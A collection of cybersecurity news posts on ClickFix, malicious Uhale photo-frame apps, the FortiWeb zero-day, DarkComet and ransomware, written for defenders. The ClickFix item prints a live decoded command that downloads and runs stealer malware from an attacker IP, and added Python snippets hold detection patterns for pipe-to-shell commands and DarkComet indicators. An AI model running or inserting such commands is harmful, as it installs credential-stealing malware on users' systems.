• A growing social engineering technique called ClickFix has emerged as one of the most successful methods for distributing malware in recent months.

    This attack tricks users into copying commands and running them directly in their operating system's command-line interface, ultimately installing information-stealing malware.

    The technique has proven remarkably effective because it bypasses traditional email security solutions and operates within browser sandboxes where most security tools cannot detect the malicious activity.

    The attack typically begins when users search for cracked software through search engines. Cybercriminals create fake landing pages hosted on trusted platforms like Google Colab, Drive, Sites, and Groups to avoid being blocked by security systems.

    These pages act as initial contact points that redirect victims based on their operating system. Windows users receive the ACR stealer, while macOS users are redirected to pages that deploy the Odyssey infostealer.

    Intel471 security researchers identified this campaign in June 2025 during proactive malware hunting operations.

    The investigation revealed that threat actors were successfully targeting both major operating systems through a single infrastructure.

    Infection chain (Source - Intel471)

    What makes this attack particularly concerning is its fileless execution. When victims paste the commands, malicious payloads are pulled directly into memory, making them invisible to traditional security software.

    Infection Mechanism and Technical Execution

    For Windows users, the attack chain guides victims through several redirection points before reaching a MEGA file hosting page containing a password-protected ZIP archive.

    Inside this archive sits the ACR stealer disguised as setup.exe. The malware not only steals credentials and personal data but also serves as a loader, installing additional threats such as SharkClipper, a cryptocurrency clipboard hijacker.

    Fake Cloudflare security check which prompts users to run a ClickFix command (Source - Intel471)

    macOS users encounter a different approach that involves a fake Cloudflare security check page. When users attempt to copy what appears to be a verification string, they actually copy a Base64-encoded shell command.

    Once decoded, the command is:

    curl -s http://45.135.232.33/droberto39774 | nohup bash

    This command silently downloads and runs the Odyssey stealer, which harvests passwords, cookies, cryptocurrency wallets, Apple Notes, Keychain entries, and system data, then compresses everything into out.zip for exfiltration.
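    The clipboard trick described above can be triaged the same way a defender would in a script: decode the Base64 string the page hands the user and check whether it hides a download-and-execute pipeline. This is an added illustration, not code from Intel471 or the campaign; the sample clipboard content and the TEST-NET host are constructed.

```python
"""Triage a ClickFix-style clipboard string: Base64-decode it and look for a
downloader piped into a shell. Added illustration; sample inputs are constructed."""
import base64
import binascii
import re
from typing import Optional

# curl/wget output piped into an interpreter, optionally wrapped in nohup.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(nohup\s+)?(bash|sh|zsh)\b")
URL_RE = re.compile(r"https?://[^\s'\"|]+")


def try_decode(candidate: str) -> Optional[str]:
    """Return the decoded text if the string is valid Base64 ASCII, else None."""
    stripped = re.sub(r"\s+", "", candidate)
    if len(stripped) < 16 or not re.fullmatch(r"[A-Za-z0-9+/=]+", stripped):
        return None
    try:
        return base64.b64decode(stripped, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_clipboard(candidate: str) -> dict:
    """Report whether clipboard content hides a pipe-to-shell command.
    The 'verification code' shown to the user is not what actually gets pasted."""
    decoded = try_decode(candidate)
    command = decoded if decoded is not None else candidate
    return {
        "base64_wrapped": decoded is not None,
        "pipe_to_shell": DOWNLOAD_RE.search(command) is not None,
        "urls": URL_RE.findall(command),
        "command": command,
    }


# Constructed sample with the same shape as the macOS one-liner in the article;
# 203.0.113.10 is a TEST-NET placeholder, not the campaign's real host.
SAMPLE_COMMAND = "curl -s http://203.0.113.10/payload | nohup bash"
SAMPLE_CLIPBOARD = base64.b64encode(SAMPLE_COMMAND.encode()).decode()

if __name__ == "__main__":
    print(triage_clipboard(SAMPLE_CLIPBOARD))
    print(triage_clipboard("Verification ID: 7F3A-22C1"))
```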


    The post New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware appeared first on Cyber Security News.


  • Digital photo frames have become a standard household device for displaying family memories, and most users assume these simple gadgets prioritize simplicity over complexity.

    However, a troubling discovery reveals that specific Android photo frames running the Uhale app automatically download and execute malware as soon as they boot.

    Quokka security analysts identified this critical issue after examining popular digital picture frame models sold on major retail platforms.

    These frames, often marketed under brands like BIGASUO, WONNIE, and MaxAngel, share a common vulnerability that puts millions of users at risk.

    The affected devices are vulnerable to automatic malware installation without user interaction.

    Security analysts at Quokka detected that the security concern extends far beyond simple data theft. These vulnerabilities create complete pathways for attackers to gain full control of the device with minimal effort.

    The malware discovered during the analysis is associated with the Vo1d botnet and the Mzmess malware family, which have already infected an estimated 1.6 million Android TV devices worldwide.

    Entities in the Uhale ecosystem (Source – Quokka)

    When connected to a home or office network, a compromised frame can serve as an entry point for lateral attacks on other devices, potentially leading to widespread network compromise and data exposure.

    The root of the problem lies in how the Uhale application handles security at the software level. Rather than implementing modern security standards, the developers relied on outdated Android 6.0 with disabled security features and hardcoded encryption keys embedded directly in the app code.

    This combination creates multiple vulnerability pathways that skilled attackers can exploit through simple network interception techniques.

    The implications are severe because these frames typically remain continuously connected to networks, providing attackers with persistent access opportunities.

    Remote Code Execution Through Insecure Trust Management

    The primary exploitation vector involves a weakness in how the Uhale app validates security certificates during network communications.

    Workflow for the Uhale 4.2.0 app (Source – Quokka)

    When a frame boots up and checks for app updates, it communicates with servers at dcsdkos.dc16888888.com over HTTPS.

    However, the app implements a custom security validator that accepts any certificate without proper verification.

    This oversight allows attackers positioned on the same network to intercept these connections and inject malicious code.

    The insecure trust manager is implemented in the com.nasa.memory.tool.lf class. Instead of validating that communication partners are legitimate, the checkServerTrusted method simply returns empty values without verifying them.

    When combined with a hardcoded encryption key DE252F9AC7624D723212E7E70972134D stored in the app, attackers can craft responses that the device will accept and decrypt.

    The response contains a download link to a Dalvik Executable file, which the app then loads and executes using Java reflection techniques.

    The execution occurs via the DexClassLoader, which dynamically loads code from external sources.

    The app creates an instance of this class loader pointing to downloaded JAR files stored in the /data/data/com.zeasn.frame/files/honor directory.

    It then looks for a predefined entry-point method, com.sun.galaxy.lib.OceanInit.init, which is invoked automatically.

    Since the Uhale app operates with system-level privileges and the devices have SELinux disabled and su commands available, the injected code immediately runs with unrestricted root access.

    This allows attackers to execute arbitrary shell commands, install persistent malware, modify system files, or harvest sensitive data from other applications.

    The malware samples identified included multiple APK packages classified by Quokka’s behavioral analysis engine as spyware with 100 percent confidence.

    These included com.app.mz.s101, com.app.mz.popan, and several others specifically designed for surveillance and system control purposes.


    The post Android Photo Frames App Downloads Malware, Giving Hackers Control of The Device Without User Interaction appeared first on Cyber Security News.


  • Payment processor Checkout.com recently experienced a data breach after being targeted by the cybercrime group “ShinyHunters.” The attackers accessed old data stored in a third-party cloud system. Luckily, Checkout.com’s live payment processing environment was not affected, and no merchant funds or card numbers were accessed. The company revealed that the breach happened last week when […]

    The post Checkout.com Suffers Data Breach as ShinyHunters Attack Cloud Storage appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A newly updated cybersecurity advisory from federal agencies reveals that the Akira ransomware operation has significantly escalated its campaign, compromising organizations worldwide and accumulating massive ransom proceeds through sophisticated attack methods. According to the joint advisory released on November 13, 2025, by the FBI, CISA, Department of Defense Cyber Crime Center (DC3), Department of Health […]

    The post CISA Warns: Akira Ransomware Has Extracted $42M After Targeting Hundreds appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Palo Alto Networks has disclosed a denial-of-service vulnerability in its PAN-OS software that allows attackers to force firewalls into unexpected reboots using specially crafted network packets. The flaw, tracked as CVE-2025-4619, affects multiple versions of PAN-OS running on PA-Series and VM-Series firewalls, as well as Prisma Access deployments. The vulnerability enables unauthenticated attackers to trigger […]

    The post Palo Alto PAN-OS Flaw Lets Attackers Force Firewall Reboots via Malicious Packets appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Following the doxxing of Lumma Stealer’s alleged core members last month, the notorious infostealer initially experienced a significant decline in activity as customers migrated to rival platforms like Vidar and StealC. However, recent telemetry data reveals a concerning resurgence of Lumma Stealer operations beginning the week of October 20, 2025, accompanied by sophisticated new capabilities […]

    The post Lumma Stealer Leverages Browser Fingerprinting for Data Theft and Stealthy C2 Communications appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A critical zero-day vulnerability in Fortinet FortiWeb has been actively exploited in the wild, allowing attackers to gain complete administrator access without any prior authentication. The flaw affects Fortinet’s Web Application Firewall, which is designed to protect web applications from malicious traffic. Vulnerability Discovery and Exploitation On October 6, 2025, cyber deception company Defused published […]

    The post Fortinet FortiWeb Zero-Day Exploited to Gain Full Admin Access appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • The rise of cryptocurrency has created new opportunities for cybercriminals to exploit unsuspecting users.

    Attackers are now disguising the notorious DarkComet remote access trojan as Bitcoin-related applications, targeting cryptocurrency enthusiasts who download tools from unverified sources.

    This malware campaign demonstrates how old threats continue to resurface with modern social engineering techniques.

    DarkComet RAT is a well-known remote access trojan that allows attackers to gain complete control over infected systems.

    Despite being discontinued by its creator years ago, the malware continues to circulate in underground forums and remains highly effective.

    It provides attackers with extensive capabilities including keystroke logging, file theft, webcam surveillance, and remote desktop control.

    These features make it particularly dangerous for cryptocurrency users, as stolen credentials can lead directly to financial losses.

    The malicious file analyzed in this campaign was distributed as a compressed RAR archive containing an executable disguised as “94k BTC wallet.exe.”

    This delivery method helps attackers bypass email filters and reduces detection rates. The executable was packed with UPX (Ultimate Packer for Executables) to further evade antivirus software and hide its true nature from security analysis.

    Point Wild security analysts identified the malware after investigating suspicious Bitcoin-related applications. The research team discovered that once extracted and executed, the fake Bitcoin tool immediately activates DarkComet’s full capabilities.

    Instead of providing any legitimate cryptocurrency functionality, the malware begins establishing persistence on the infected system and attempts to communicate with its command-and-control server.

    Technical Breakdown and Infection Mechanism

    The malware establishes persistence by copying itself to %AppData%\Roaming\MSDCSC\explorer.exe and creating a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

    File Info image (Source - Point Wild)

    This ensures the malware executes automatically every time the system restarts. The image above shows the file information of the compressed RAR archive, while the one below shows the UPX packing structure visible in CFF Explorer.

    UPX Packed (Source - Point Wild)

    Analysis revealed the sample’s embedded configuration containing critical operational details.

    The malware uses a mutex named DC_MUTEX-ARULYYD to prevent multiple instances from running simultaneously.

    Network analysis showed attempted connections to the command-and-control server at kvejo991.ddns.net over TCP port 1604.

    Although the C2 server was offline during testing, the repeated connection attempts confirmed active beaconing behavior consistent with DarkComet operations.

    The unpacked executable revealed multiple standard PE sections, including .text, .data, and .idata.

    The malware injects its payload into legitimate Windows processes like notepad.exe to perform keylogging and screen capture while remaining hidden.

    Captured keystrokes are stored in log files with names like “2025-10-29-4.dc” before being exfiltrated through the C2 channel.

    File hashes for detection include SHA256: 11bf1088d66bc3a63d16cc9334a05f214a25a47f39713400279e0823c97eb377 for the compressed archive and SHA256: 5b5c276ea74e1086e4835221da50865f872fe20cfc5ea9aa6a909a0b0b9a0554 for the packed executable.
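    The host indicators above (the MSDCSC drop path and Run key, the DC_MUTEX- name, the C2 host and port, the .dc keylog files) can be turned into a small triage routine for exported host telemetry. This is an added illustration, not Point Wild's tooling; the telemetry records, user name and Run-key value name are constructed, and the hashes are left to AV/EDR matching.

```python
"""Match exported host telemetry against the DarkComet indicators in the write-up.
Added illustration; every sample record below is constructed."""
import re
from typing import Dict, List

# Indicators quoted in the article.
C2_HOST, C2_PORT = "kvejo991.ddns.net", 1604   # 1604 is also DarkComet's default port
MUTEX = "DC_MUTEX-ARULYYD"
# Real explorer.exe lives under \Windows\; a copy under \MSDCSC\ is the persistence drop.
DROP_PATH_RE = re.compile(r"\\MSDCSC\\explorer\.exe", re.IGNORECASE)
# Keylog files are named YYYY-MM-DD-N.dc, e.g. 2025-10-29-4.dc
KEYLOG_RE = re.compile(r"^\d{4}-\d{2}-\d{2}-\d+\.dc$")


def audit(run_keys: Dict[str, str], mutexes: List[str],
          connections: List[dict], files: List[str]) -> List[str]:
    """Return one finding string per matched indicator; empty list means clean."""
    findings = []
    for name, cmd in run_keys.items():            # HKCU\...\CurrentVersion\Run values
        if DROP_PATH_RE.search(cmd):
            findings.append(f"run-key persistence: {name} -> {cmd}")
    for m in mutexes:
        if m == MUTEX or m.startswith("DC_MUTEX-"):  # family-wide mutex prefix
            findings.append(f"darkcomet mutex: {m}")
    for c in connections:
        if c.get("proto") == "tcp" and (c.get("host") == C2_HOST or c.get("port") == C2_PORT):
            findings.append(f"c2 beacon: {c['host']}:{c['port']}")
    for path in files:
        if KEYLOG_RE.match(path.rsplit("\\", 1)[-1]):
            findings.append(f"keylog artifact: {path}")
    return findings


# Constructed telemetry: one benign and one suspicious entry per category.
SAMPLE_RUN_KEYS = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "MicroUpdate": r"C:\Users\alice\AppData\Roaming\MSDCSC\explorer.exe",  # value name is made up
}
SAMPLE_MUTEXES = [r"Local\ZonesCounterMutex", "DC_MUTEX-ARULYYD"]
SAMPLE_CONNECTIONS = [
    {"proto": "tcp", "host": "update.example.org", "port": 443},
    {"proto": "tcp", "host": "kvejo991.ddns.net", "port": 1604},
]
SAMPLE_FILES = [
    r"C:\Users\alice\AppData\Roaming\MSDCSC\2025-10-29-4.dc",
    r"C:\Users\alice\Documents\notes.txt",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_RUN_KEYS, SAMPLE_MUTEXES, SAMPLE_CONNECTIONS, SAMPLE_FILES):
        print(finding)
```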

    Users should avoid downloading cryptocurrency tools from untrusted sources and maintain updated security software to detect such threats effectively.


    The post Beware of Fake Bitcoin Tool That Hides DarkComet RAT Malware With it appeared first on Cyber Security News.


  • A critical vulnerability in Fortinet’s FortiWeb Web Application Firewall (WAF) is being actively exploited by threat actors, potentially as a zero-day attack vector.

    The flaw, which enables unauthenticated attackers to gain administrator-level access to the FortiWeb Manager panel and WebSocket command-line interface, was first highlighted through a proof-of-concept (PoC) exploit shared by cyber deception firm Defused on October 6, 2025. This discovery came after Defused’s honeypot captured real-world attempts targeting exposed FortiWeb instances.

    FortiWeb serves as a vital defense mechanism, designed to detect and block malicious traffic aimed at web applications, making it a prime target for attackers seeking to undermine organizational security postures.

    The vulnerability appears to stem from a path traversal issue that allows remote exploitation without prior access, potentially leading to full device compromise and subsequent lateral movement within networks.

    Security firm Rapid7 confirmed the exploit’s efficacy through testing, noting it successfully creates unauthorized admin accounts like “hax0r” on vulnerable versions.

    The testing revealed significant differences in responses between the affected and patched versions.

    On FortiWeb 8.0.1, released in August 2025, a successful exploit returns an HTTP 200 OK response with JSON details of the new admin user, including encrypted passwords and access profiles.

    In contrast, version 8.0.2, released at the end of October, rejects the attempt with an HTTP 403 Forbidden error, indicating potential mitigation.

    Rapid7 emphasized that while the public PoC fails against 8.0.2, it’s unclear if this update includes a deliberate silent fix or coincidental changes.

    Exploitation in the wild has been reported since October 2025, with Defused claiming targeted attacks on exposed devices. Global scanning and spraying of the exploit have escalated, involving IP addresses from regions like the US, Europe, and Asia.

    Adding to the urgency, on November 6, 2025, Rapid7 spotted an alleged zero-day exploit for FortiWeb offered for sale on a prominent black hat forum, though its relation to this flaw remains unconfirmed.

    Hacker Forum claim

    As of November 13, 2025, Fortinet has not issued official guidance, assigned a CVE identifier, or published a matching advisory on its PSIRT feed.

    Organizations using FortiWeb versions before 8.0.2 face immediate risk and should prioritize emergency updates or isolate management interfaces from public exposure. Defenders are also urged to scan logs for suspicious admin account creations and monitor Fortinet’s channels for impending disclosures.

    The absence of vendor acknowledgment heightens concerns, especially given Fortinet’s history of targeted attacks.

    Researchers at watchTowr Labs have even released tools to detect vulnerable instances by generating random admin users.

    This incident underscores the need for rapid patching in critical infrastructure, as broad exploitation could soon follow initial targeted hits. Updates to this story will incorporate any official responses from Fortinet.


    The post Critical Fortinet FortiWeb Vulnerability Exploited in the Wild to Create Admin Accounts appeared first on Cyber Security News.


  • Payment processor Checkout.com revealed on Thursday that notorious hacking group ShinyHunters had infiltrated a legacy third-party cloud file storage system, exposing internal documents from years past.

    The breach, which the company attributes to its own oversight in decommissioning the outdated platform, affects less than 25% of its current merchant base but spares critical payment infrastructure.

    The incident surfaced last week when ShinyHunters, a collective known for high-profile data thefts including breaches at Microsoft, AT&T, and Ticketmaster, contacted Checkout.com demanding a ransom.

    The group claimed possession of sensitive data tied to the London-based fintech firm, which processes billions in transactions annually for e-commerce giants worldwide.

    Upon investigation, Checkout.com confirmed unauthorized access to a cloud system used before 2020 for internal operational documents and merchant onboarding materials. “This was our mistake, and we take full responsibility,” stated Mariano Albera, the company’s Chief Technology Officer, in an official blog post.

    What Data Was Affected

    The legacy setup, managed by a third-party provider, was not properly retired, creating a vulnerability that threat actors exploited. Crucially, the hackers never reached the live payment processing platform; no merchant funds, card numbers, or real-time transaction data were compromised.

    ShinyHunters, active since at least 2020, has built a reputation for selling stolen data on dark web forums, often targeting financial and tech sectors.

    Their tactics typically involve exploiting misconfigurations or weak access controls, which aligns with the decommissioning lapse here. Security experts note this as a reminder of “zombie systems”: forgotten infrastructure that lingers as easy prey for cybercriminals.

    Checkout.com emphasized transparency in its response, vowing not to yield to extortion. “We will not pay this ransom,” Albera declared. Instead, the company plans to donate an equivalent amount to Carnegie Mellon University and the University of Oxford’s Cyber Security Center, funding research to combat cybercrime.

    “Security, transparency, and trust are the foundation of our industry,” he added. “We will own our mistakes, protect our merchants, and invest in the fight against the criminal actors who threaten our digital economy.”

    The firm is now notifying affected merchants and collaborating with law enforcement and regulators to mitigate the fallout. “We are sorry. We regret that this incident has caused worry for our partners,” Albera wrote, offering direct support through account managers.


    The post Checkout.com Hacked – ShinyHunters Breached Cloud Storage, Company Refuses Ransom appeared first on Cyber Security News.
